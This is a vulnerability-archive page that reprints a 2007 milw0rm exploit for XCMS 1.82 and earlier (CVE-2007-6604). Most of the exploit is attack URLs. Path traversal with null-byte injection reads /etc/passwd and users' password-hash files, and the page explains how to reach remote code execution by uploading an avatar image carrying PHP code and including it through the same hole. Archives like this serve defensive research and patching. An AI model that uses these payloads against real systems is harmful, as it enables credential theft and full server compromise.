Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-6604

Publish Date: 28 Dec 2007

Author: nexen

                							

                #  _ __   _____  _____ _ __
# | '_ \ / _ \ \/ / _ \ '_ \
# | | | |  __/&gt;  &lt;  __/ | | |
# |_| |_|\___/_/\_\___|_| |_|
# XCMS &lt;= 1.82 LFI &amp; RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&amp;s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&amp;pg=../../../../../etc/passwd\0

# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&amp;pg=../../dati/membri/[username].dtb\0

# RCE:
Doing RCE is more difficult, you must have an image with a php code binded (you can use edjpgcom to do that)
now upload that image on your panel, and exploit rce trough lfi:

http://127.0.0.1/xcms/index.php?mod=[existing module]&amp;pg=../../uploads/avatar/[your_username].jpg\0

# milw0rm.com [2007-12-28]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

XCMS 1.82 - Local/Remote File Inclusion

Vulmon Search

About

Products

Connect